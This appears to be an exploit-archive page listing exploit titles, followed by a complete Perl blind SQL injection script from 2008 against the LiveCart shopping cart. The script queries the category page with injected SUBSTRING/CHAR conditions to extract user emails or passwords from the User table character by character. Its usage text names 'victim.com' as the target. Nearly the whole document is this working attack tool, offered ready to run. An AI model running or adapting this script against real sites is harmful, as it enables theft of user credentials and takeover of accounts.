477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
104 lines
2.6 KiB
Perl
Executable file
104 lines
2.6 KiB
Perl
Executable file
#!/usr/bin/perl -w
|
|
use LWP::UserAgent;
|
|
#-----------------------------------------------------------------------------------------------#
|
|
# scripts : livecart Remote Blind Sql Injection #
|
|
# scripts site : http://www.livecart.com #
|
|
# #
|
|
# Discovered #
|
|
# By : irvian #
|
|
# site : http://irvian.cn #
|
|
# forum : http://noscan.info/forum #
|
|
# email : irvian.info@gmail.com #
|
|
# #
|
|
# Thanks To #
|
|
# friend : str0ke, nyubi, ibnusina, arioo, jipank, ifx, karet, bluespy and all my friend #
|
|
#-----------------------------------------------------------------------------------------------#
|
|
# sample : #
|
|
# http://demo.livecart.com #
|
|
#-----------------------------------------------------------------------------------------------#
|
|
print "\r\n[+]----------------------[+]\r\n";
|
|
print "[+]Blind SQL injection [+]\r\n";
|
|
print "[+]Livecart [+]\r\n";
|
|
print "[+]code by irvian [+]\r\n";
|
|
print "[+]irvian[dot]cn [+]\r\n";
|
|
print "[+]----------------------[+]\n\r";
|
|
if (@ARGV < 3){
|
|
die "
|
|
Cara Mengunakan : perl $0 host option userid
|
|
|
|
Keterangan
|
|
host : http://victim.com atau victim.com
|
|
Option : pilih 1 untuk mencari email dan pilih 2 untuk mencari password
|
|
userid : Limit
|
|
Contoh : perl $0 http://victim.com 1 1
|
|
\n";}
|
|
|
|
|
|
$url = $ARGV[0];
|
|
$option = $ARGV[1];
|
|
$id = $ARGV[2];
|
|
|
|
if ($option eq 1){
|
|
syswrite(STDOUT, "email: ", 7);}
|
|
elsif ($option eq 2){
|
|
syswrite(STDOUT, "password: ", 10);}
|
|
|
|
for($i = 1; $i <= 32; $i++){
|
|
$f = 0;
|
|
$n = 32;
|
|
while(!$f && $n <= 57)
|
|
{
|
|
if(&blind($url, $option, $id, $i, $n, $id)){
|
|
$f = 1;
|
|
syswrite(STDOUT, chr($n), 1);
|
|
}
|
|
$n++;
|
|
}
|
|
if ($f==0){
|
|
$n = 97;
|
|
while(!$f && $n <= 122)
|
|
{
|
|
if(&blind($url, $option, $id, $i, $n, $id)){
|
|
$f = 1;
|
|
syswrite(STDOUT, chr($n), 1);
|
|
}
|
|
$n++;
|
|
}
|
|
}
|
|
}
|
|
|
|
print "\n[+]finish Execution Exploit\n";
|
|
|
|
|
|
|
|
sub blind {
|
|
my $site = $_[0];
|
|
my $op = $_[1];
|
|
my $id = $_[2];
|
|
my $i = $_[3];
|
|
my $n = $_[4];
|
|
my $r = $_[5];
|
|
if ($op eq 1){$klm = "email";}
|
|
elsif ($op eq 2){$klm = "password";}
|
|
$site =~ s/^http:\/\///;
|
|
my $url = "http://"."$site"."/category?id=1"."%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."User"."%20LIMIT%20"."$r".",1"."),"."$i".",1)=CHAR("."$n".")";
|
|
my $browser = &zero($url);
|
|
|
|
if ($browser !~ /Error Code 500/gi){
|
|
return 1;
|
|
}
|
|
else {
|
|
return 0;
|
|
}
|
|
}
|
|
|
|
sub zero($){
|
|
my $spy = $_[0];
|
|
my $ua = LWP::UserAgent->new;
|
|
$ua->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
|
|
my $res = $ua->get($spy);
|
|
my @r = $res->content;
|
|
$page="@r";
|
|
return $page;}
|
|
|
|
# milw0rm.com [2008-04-10]
|